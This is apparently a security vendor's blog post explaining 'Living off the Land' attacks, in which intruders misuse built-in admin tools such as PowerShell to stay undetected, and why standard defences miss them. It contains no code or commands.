READ TIME: 21 minutes
Attacks on your organization are bad enough when you’re able to quickly detect and stop them, but when they get in and just sit there, they can be downright scary. Lately, we're seeing a resurgence in threat actors leveraging an attack method called "Living off the Land”, or LotL.
In their 2020 Cyber Threatscape Report, Accenture provides a very clear picture of the increased use of LotL techniques by state-sponsored actors and other criminal groups. Essentially, adversaries are more often using legitimate admin tools to compromise secure environments undetected. The first access is typically accomplished by exploiting a vulnerability or tricking an end user. However, unlike traditional non-LotL attacks where the threat actor gets the endpoint to install some software (an executable virus), the adversary drops no files or executable.
Rather, it uses existing tools on a victim’s machine, drops malicious scripts or exploitive code to use it against them. On Windows, most LotL attacks will use a malicious PowerShell at some point. Whereas on Linux, a LotLattack on a web server may use a webshell written in php. LotL may even use wget to launch a superset of fileless attacks. These are all within whitelisted system admin tools. As the moniker Living off the Land would indicate, they’re in no rush to ‘cash in’, operating with a ‘canary in the coal mine perspective.
“If the canary is still alive in a month”, they know they’re good to continue their attack largely undetected. Once the threat actors have access to your environment, they can run almost anything. It can reside in the RAM of your endpoint, as above, or it could even infiltrate a web server, for example, once run via Powershell. The actor uses this undetected dwell time to learn the infected host’s environment, network, customers, and partners.
Why are Living off the Land attacks so successful?
Simply put, most detection solutions like Anti-virus, Anti-Spam Gateways and Next Generation Firewalls fail to detect LotL as they simply recognize the threat as ‘Potentially Unwanted Programs’ (PUPs) and ‘Potentially Unwanted Modifications’ (PUMs) at best, and don’t block it. No alerting occurs as the applications involved are regularly used by users. When there is a PUP or PUM detection, they are often lost due to false positives. Threat actors leverage this lack of detection and dwell until detected by threat hunting.
How can you manage the risk? Check out our Threat Insight report for more information.